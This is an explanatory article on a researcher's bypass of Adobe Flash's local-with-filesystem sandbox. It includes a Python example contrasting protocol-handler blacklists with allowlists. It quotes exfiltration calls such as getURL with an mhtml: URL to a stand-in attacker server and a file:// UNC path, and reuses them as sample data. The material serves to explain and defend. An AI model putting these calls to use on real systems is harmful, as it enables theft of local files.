Rios has developed a way to bypass the local-with-filesystem sandbox that Adobe built for Flash files loaded from the local file system. That sandbox lets a SWF read local files but is supposed to deny it any network access, so a malicious file cannot send what it reads to an outside server or take other actions without the user's knowledge.
In his blog, Rios explained how a sandboxed SWF can read a local file and then pass its contents to an attacker-controlled server through a protocol handler that Adobe's sandbox does not block.
“The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server. For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like: file://\\192.168.1.1\stolen-data-here\ [...] In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists. If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win.”
Rios added: “There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox: getURL('mhtml:http://attacker-server.com/stolen-data-here', '');”
The researcher said that he learned two lessons from developing this method to bypass the Adobe sandbox: “One, running untrusted code (whether it’s an executable, JavaScript, or even a SWF) is dangerous. Two, protocol handler blacklists are bad.”
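To make Rios' second lesson concrete, here is an added illustration (not code from Rios' post, from Adobe, or from Flash Player) of the difference between a scheme blacklist and a scheme allowlist. The blacklist, the allowlist, and the sample URLs are all constructed for the example; the only thing taken from the article is the observation that mhtml: reaches the network while not appearing on the blacklist. The allowlist rejects every scheme it has not been told about, so a handler the sandbox author never heard of fails closed instead of open.

```python
import re
from typing import Dict, Optional

# RFC 3986 scheme syntax: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":".
_SCHEME_RE = re.compile(r'^([A-Za-z][A-Za-z0-9+.\-]*):')


def scheme_of(url: str) -> Optional[str]:
    """Return the lower-cased scheme of url, or None if it has no scheme."""
    m = _SCHEME_RE.match(url.strip())
    return m.group(1).lower() if m else None


# Constructed blacklist: the schemes an author "knows" reach the network.
# The list has to stay complete forever; mhtml is an example of one that was
# missed (it wraps an inner http URL on Windows, as described in the article).
NETWORK_BLACKLIST = {"http", "https", "ftp", "file", "smb"}

# Constructed allowlist: the only schemes a local-only sandbox would permit.
ALLOWLIST = {"about"}


def naive_blacklist_allows(url: str) -> bool:
    """A prefix match on the raw string: case-sensitive and whitespace-sensitive."""
    return not url.startswith(tuple(s + ":" for s in NETWORK_BLACKLIST))


def blacklist_allows(url: str) -> bool:
    """A correctly normalised blacklist: still allows anything it has not listed."""
    return scheme_of(url) not in NETWORK_BLACKLIST


def allowlist_allows(url: str) -> bool:
    """Permit only known-safe schemes; an unknown or missing scheme is denied.

    Single-letter schemes such as the 'c' parsed out of a Windows path like
    C:\\secret.txt never appear on the allowlist, so they are denied too.
    """
    s = scheme_of(url)
    return s is not None and s in ALLOWLIST


def evaluate(url: str) -> Dict[str, bool]:
    """Show how each policy decides one URL."""
    return {
        "naive_blacklist": naive_blacklist_allows(url),
        "blacklist": blacklist_allows(url),
        "allowlist": allowlist_allows(url),
    }


# Constructed sample requests, including the two from the article.
SAMPLE_URLS = [
    "file://\\\\192.168.1.1\\stolen-data-here",            # blocked by the blacklist
    "mhtml:http://attacker-server.com/stolen-data-here",   # missed by the blacklist
    "HTTP://attacker-server.com/stolen-data-here",         # slips past a naive prefix match
    "about:blank",                                          # the one thing the allowlist permits
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(f"{u!r:55} -> {evaluate(u)}")
```

Only the mhtml line comes out as "allowed" under the normalised blacklist, which is exactly the gap Rios exploited; the allowlist denies it along with every other scheme it was never told about.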
Software vendors increasingly rely on sandboxes to limit what a malicious or compromised application can do. As Rios' method demonstrates, a sandbox is not a fail-safe measure: one that enforces its network restriction with a blacklist of protocol handlers fails as soon as an attacker finds a handler the list omits.